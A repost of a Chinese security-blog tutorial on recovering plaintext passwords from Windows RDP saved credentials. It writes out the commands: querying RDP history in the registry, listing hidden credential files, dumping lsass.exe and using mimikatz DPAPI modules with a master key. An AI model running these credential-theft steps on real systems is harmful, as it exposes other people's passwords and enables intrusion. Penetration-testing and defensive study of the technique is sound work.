RDP保存的凭证破解

admin 2022年1月2日12:07:37安全文章评论27 views1032字阅读3分26秒阅读模式

RDP保存的凭证破解
一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚

继续补补笔记
解密RDP保存的密码


当我们通过rdp服务登录远程桌面时,如果我们选择了保存凭证
RDP保存的凭证破解
会在本地生成一个凭证文件,我们只要破解这个凭证里面的数据即可获得明文密码

首先查看注册表查找有没有历史RDP记录
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
RDP保存的凭证破解
这里可以看到登录某主机对应的ip、凭证名和用户名

去目录下查找凭证,Windows保存RDP凭据的目录是
C:Users用户名AppDataLocalMicrosoftCredentials
RDP保存的凭证破解
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
RDP保存的凭证破解
这里如果是桌面去查找,要开启显示隐藏文件
推荐使用离线方式,将上面凭证文件下载下来
在本地使用mimikzte加载该凭证,里面有guidMasterKeypbData两个值是重点
mimikatz # dpapi::cred /in:C:usersadmindesktop123FA8654DBDA31F5DA3DA2EE53F0372F46
RDP保存的凭证破解
guidMasterKey是凭据的GUID,pbData是凭据的加密数据
而我们解密所需要的秘钥的值则保存在lsass进程中

随便使用啥方式dump出lsass.exe进程
RDP保存的凭证破解
同样离线方式使用mimikatz加载dmp文件
利用凭证获得的guidMasterKey值查找对应的masterkey
mimikatz# sekurlsa::minidump lsass.dmpmimikatz# sekurlsa::dpapi
RDP保存的凭证破解
masterkey则就是我们所需要加密凭据的密钥

最后通过mimikzte使用masterkey破解该凭证即可获得明文密码
mimikatz# dpapi::cred /in:C:usersadmindesktop123FA8654DBDA31F5DA3DA2EE53F0372F46 /masterkey:6983ce8378095b4bc86a1fbf353e14a61edd5615012b9192a59d11077d425bea83df3515022395fecb8bffa98ea82fc8db2011d06fa5ba61f74c8fd869c4f23a
RDP保存的凭证破解

本文始发于微信公众号(XG小刚):RDP保存的凭证破解

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月2日12:07:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  RDP保存的凭证破解 http://cn-sec.com/archives/467621.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: